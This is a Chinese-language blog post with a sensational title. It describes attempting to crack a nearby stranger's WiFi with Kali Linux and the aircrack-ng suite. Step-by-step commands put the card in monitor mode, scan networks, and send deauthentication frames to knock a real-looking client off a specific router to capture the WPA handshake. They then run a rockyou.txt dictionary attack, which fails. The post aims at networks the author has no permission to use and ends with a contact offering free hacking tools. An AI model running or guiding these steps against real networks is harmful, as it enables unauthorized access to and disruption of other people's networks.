写点什么

昨晚破解隔壁少妇的 WIFI,看到密码后我果断敲门

用户头像
Machine Gun
关注
发布于: 3 小时前

前言:

新搬的地方还没有安装 WIFI,流量手机流量快烧完了,看着附近的 WIFI,很是心动。于是上网搜索了一下教程进行试验,试验过程和结果,仅作为学习记录。



目录

前言:

试验环境:

试验过程:

试验结果:

个人总结:


试验环境:

  1. 台式机

  2. Kali 虚拟机

  3. 无线网卡

  4. 菜鸡一只

试验过程:

一、无线网卡安排

1.主机 USB 接口直接怼入无线网卡,Kali 虚拟机弹窗提示,选择连接到虚拟机,选中 Kali,点击确定。(看到有些教程说需要安装驱动,这可能跟所购买的无线网卡是否免驱有关,我这里是免驱版的,直接怼入即可使用。)



2.1.此时在 Kali 的网络连接处就可以看到,虚拟机可以搜索到附近的 WIFI。说明网卡怼入成功。


2.2.打开终端输入 ifconfig 查看网卡,存在 wlan0。也说明网卡怼入成功。



2.3.终端输入 iwconfig,存在网卡 wlan0,也说明网卡怼入成功。



2.4.虚拟机检查可移动设备,可以清楚的看到无线网卡的型号。也是说明网卡怼入成功。



二、握手包抓取

1.1.输入命令,清除系统中可能影响监听的进程:

airmon-ng check kall
复制代码


1.2.开启网卡监听:

airmon-ng start wlan0
复制代码


1.3.检查是否成功开启监听:(可以看到 wlan0 变成了 wlan0mon,说明成功开启监听模式)

iwconfig
复制代码



2.开始探测附近的 WIFI:

airodump-ng wlan0mon
复制代码


主要看三个参数:

  1. BSSID:路由器的 MAC 地址

  2. PWR:信号值,绝对值越低,说明信号越强

  3. CH:当前路由器使用的信道



3.找一个信号比较强的 WIFI 进行监听,这里选择了一个小米的 WIFI,BSSID 为:64:64:4A:E3:90:41,使用的信道为 1,输入命令,开始监听:

airodump-ng --bssid 64:64:4A:E3:90:41 -c 1 -w test wlan0mon
复制代码


参数说明:

  1. –bssid:路由器的 MAC 地址

  2. -c:路由器使用的信道

  3. -w:抓取的握手包名称,可以选择输出的路径,这里使用默认输出路径为根目录

(下图说明:BSSID 为路由器 MAC 地址,STATION 为当前连接在路由器上的设备的 MAC 地址)



4.另外再打开一个终端,对当前正在连接的某个设备进行攻击,使其断开与路由器的连接。(原理没有深究,大概使向目标发送大量数据,或者类似于 ARP 欺骗的攻击,使设备与路由器断开连接,停止攻击后,设备会自动连接上路由器,此时就可以抓取到握手包。)

aireplay-ng -0 10 -a 64:64:4A:E3:90:41 -c 9C:2E:A1:9F:9E:2F wlan0mon或者 aireplay-ng --deauth 10 -a 64:64:4A:E3:90:41 -c 9C:2E:A1:9F:9E:2F wlan0mon
复制代码


参数说明:

  1. -0、–deauth:指定对目标进行攻击的次数

  2. -a:路由器的 MAC 地址

  3. -c:目标 MAC 地址



5.等待攻击完成,此时在第一个终端会显示握手包抓取成功,如下图:



6.在根目录生成有一些握手包文件,其中包含 test-01.cap



三、爆破开启

1.在终端输入命令:

aircrack-ng -w /usr/share/wordlists/rockyou.txt test-01.cap
复制代码


参数说明:

  1. -w:指定一个密码文件,这里使用的是 Kali 自带的密码文件,可以在文件系统中找到。

(PS:我一开始使用此命令时报错,缺少-w 参数,然后进入密码存放文件路径中发现,自带的密码是一个压缩包,需要先解压才能用,源文件为:rockyou.txt.gz。后面的.cap 文件,如果一开始更改的存放的位置需要加上完整的路径)



试验结果:

1.等待爆破结束:(很遗憾,密码字典不够强大,没有爆破出来,密码正确会显示在终端)



个人总结:

感觉就是学习了一个工具的大概使用过程,aircrack-ng 原理是使用 CPU 去跑包,全程不需要联网,破解速度看个人 CPU 的性能。此间还看到了一个利用显卡 GPU 去跑字典的教程,前期一样的是抓取握手包,然后使用 hashcat 这个工具进行爆破,据说速度比 aircrack-ng 快的多。还有一些其他的工具,如:EWSA(与 hashcat 原理差不多)(一样做了试验,但是 hashcat 没跑起来,原因是:我的电脑显卡是集成显卡,太垃圾了。需要独立显卡才可以跑)

(PS:穷举爆破这种事,关键还是字典和目标密码强度,个人脸黑,看来得自己尽快搞个 WIFI 了)

【昨晚激♂情资料&录像】



用户头像

Machine Gun

关注

还未添加个人签名 2021.03.28 加入

需要获取网络安全/渗透测试学习资料工具的朋友可联系V:machinegunjoe666 免费索取

评论

发布
暂无评论
昨晚破解隔壁少妇的WIFI,看到密码后我果断敲门